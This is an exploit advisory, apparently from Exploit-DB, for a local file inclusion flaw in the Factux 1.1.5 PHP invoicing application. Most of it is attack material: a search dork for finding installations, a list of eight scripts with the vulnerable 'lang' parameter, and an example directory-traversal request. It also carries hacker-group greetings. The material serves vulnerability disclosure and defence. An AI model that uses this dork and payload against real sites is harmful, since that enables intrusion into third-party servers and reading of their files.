Factux - Local File Inclusion

EDB-ID:

12521

CVE:



Author:

ALTBTA

Type:

webapps


Platform:

PHP

Date:

2010-05-06


[~]######################################### InformatioN
#############################################[~]
[~] Title : Factux LFI Vulnerability
[~] Author: altbta [l_9[at]hotmail.com]
[~] download : http://www.toocharger.com/telecharger/scripts/factux/3468.htm

[~]######################################### ExploiT
#############################################[~]
[~] dork: "Factux le facturier libre V 1.1.5"

### include_once("include/language/$lang.php");

[~] Vulnerable File :

http://127.0.0.1/Factux/admin_modif.php?lang=
http://127.0.0.1/Factux/admin?lang=
http://127.0.0.1/Factux/article_new.php?lang=
http://127.0.0.1/Factux/article_update.php?lang=
http://127.0.0.1/Factux/backup.php?lang=
http://127.0.0.1/Factux/backup_timeout.php?lang=
http://127.0.0.1/Factux/bon_suite.php?lang=
http://127.0.0.1/Factux/ca_annee.php?lang=


[~] Example :

http://[site]/factux/ca_annee.php?lang=../../index


[~]#########################################~~{  altbta
}~~######################################[~]

rxh & sad hacker & ab0-3th4b